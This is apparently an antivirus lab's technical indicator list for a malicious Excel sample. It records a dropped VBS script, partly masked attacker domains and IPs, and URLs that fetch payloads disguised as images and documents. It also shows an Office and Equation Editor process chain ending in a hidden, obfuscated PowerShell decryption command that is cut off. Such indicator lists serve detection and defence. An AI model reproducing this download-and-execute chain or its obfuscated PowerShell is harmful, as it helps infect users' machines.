Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\crosscheckingeverythinggood.vBS"
- %APPDATA%\crosscheckingeverythinggood.vbs
- <Текущая директория>\0c701000
- <PATH_SAMPLE>.xls
- 'tn#.wtf':80
- '91.##4.103.134':80
- 'pa###code.dev':443
- '19#.#6.176.133':80
- http://tn#.wtf/ZDC
- http://91.##4.103.134/56/gv/somethngsweethoneygreatforeverythingtounderstandgirlfriendsweetgood_________sheiseverythingtounderstandthebeautifuldayswithme.doc
- http://91.##4.103.134/56/crosscheckingeverythinggood.gIF
- http://19#.#6.176.133/Upload/vbs.jpeg
- 'pa###code.dev':443
- DNS ASK tn#.wtf
- DNS ASK pa###code.dev
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esMana... (со скрытым окном)